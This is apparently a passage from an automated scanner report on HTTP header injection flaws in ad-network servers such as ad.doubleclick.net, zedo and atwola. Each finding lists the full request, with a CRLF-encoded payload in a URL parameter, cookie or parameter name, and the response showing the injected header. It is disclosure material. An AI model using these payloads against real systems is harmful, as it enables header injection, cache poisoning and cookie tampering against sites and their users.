Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2d7db
c78d659218b
/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 09 May 2011 15:38:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.6441.USATODAY.COM/B5327539.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12211%0d%0ad920f750be7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12211%0d%0ad920f750be7/N2883.6441.USATODAY.COM/B5327539.11;sz=300x250;pc=[TPAS_ID];click=http%3A//gannett.gcion.com/adlink%2F5111%2F798269%2F0%2F170%2FAdId%3D1587637%3BBnId%3D1%3Bitime%3D955400653%3Bkey%3Dcw27%2Bcw296%2Bcw22%2Bcw5%2Bcw461%2Bcw9%2Bcw145%3Blink%3D;ord=955400653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12211
d920f750be7
/N2883.6441.USATODAY.COM/B5327539.11;sz=300x250;pc=[TPAS_ID];click=http: //gannett.gcion.com/adlink/5111/798269/0/170/AdId=1587637;BnId=1;itime=955400653;key=cw27+cw296+cw22+cw5+cw461+cw9+cw145;link=;ord=955400653
Date: Mon, 09 May 2011 15:37:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/adj/cm.rub_usatoday/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 523df%0d%0a3531c6c3ac7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /523df%0d%0a3531c6c3ac7/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.280-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=310802;contx=weath;an=280;dc=w;btg=am.h;btg=am.b;btg=cm.ent_h;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/523df
3531c6c3ac7
/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.280-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=310802;contx=weath;an=280;dc=w;btg=am.h;btg=am.b;btg=cm.ent:
Date: Mon, 09 May 2011 15:37:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/adj/ipc-csm/globalisation_US [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ipc-csm/globalisation_US

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1a24a%0d%0ac7bc2fb3a0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1a24a%0d%0ac7bc2fb3a0/ipc-csm/globalisation_US;sz=300x250;click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%26client%3Dca-pub-6743622525202572%26adurl%3D;ord=1775429076? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1a24a
c7bc2fb3a0
/ipc-csm/globalisation_US;sz=300x250;click=http: //adclick.g.doubleclick.net/aclk
Date: Mon, 09 May 2011 15:36:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/adj/n6735.NPR/utility_search [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6735.NPR/utility_search

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f36c%0d%0abfaaccb7365 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f36c%0d%0abfaaccb7365/n6735.NPR/utility_search;sz=300x250;tile=1;sc=;ord=6265119875; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f36c
bfaaccb7365
/n6735.NPR/utility_search;sz=300x250;tile=1;sc=;ord=6265119875;:
Date: Mon, 09 May 2011 15:40:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 86a12%0d%0ad65070f037d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif86a12%0d%0ad65070f037d?0.18015406071208417 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif86a12
d65070f037d
:
Date: Mon, 09 May 2011 15:35:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload b6114%0d%0a02fa660963c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304955298754?&b6114%0d%0a02fa660963c=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240052939;0-0;0;58826896;24/24;41597555/41615342/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;;b6114
02fa660963c
=1;~cs=d:
Date: Mon, 09 May 2011 15:35:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1240

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;240052939;0-0;0;58826896;24/24;41597555/41615342/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic1
...[SNIP]...

1.9. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 8b0d3%0d%0a04bcc849ea1 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=8b0d3%0d%0a04bcc849ea1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:16 GMT
Expires: Mon, 09 May 2011 15:35:16 GMT
DCLK_imp: v7;x;44306;0-0;0;58826896;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=8b0d3
04bcc849ea1
;~cs=u:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/t;44306;0-0;0;58826896;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

1.10. http://bidder.mathtag.com/iframe/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload a9839%0d%0a37a97c57239 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=a9839%0d%0a37a97c57239&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 404 Not found
Date: Mon, 09 May 2011 15:36:40 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - a9839
37a97c57239

x-mm-host: ewr-bidder-x6
Connection: keep-alive

Request not found

1.11. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload a641d%0d%0a5aa97b6dac6 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=a641d%0d%0a5aa97b6dac6&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:a641d
5aa97b6dac6
;expires=Tue, 10 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',a641d
5aa9
...[SNIP]...

1.12. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 8c360%0d%0a167f60ab8da was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AAU&si=18181&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde8c360%0d%0a167f60ab8da; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:45 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:45 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560265|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955465^1304957265|18181^1304955465^1304957265; path=/; expires=Mon, 09-May-11 16:07:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde8c360
167f60ab8da
,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

1.13. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 88780%0d%0aeb91e55787 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AAU&si=88780%0d%0aeb91e55787&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
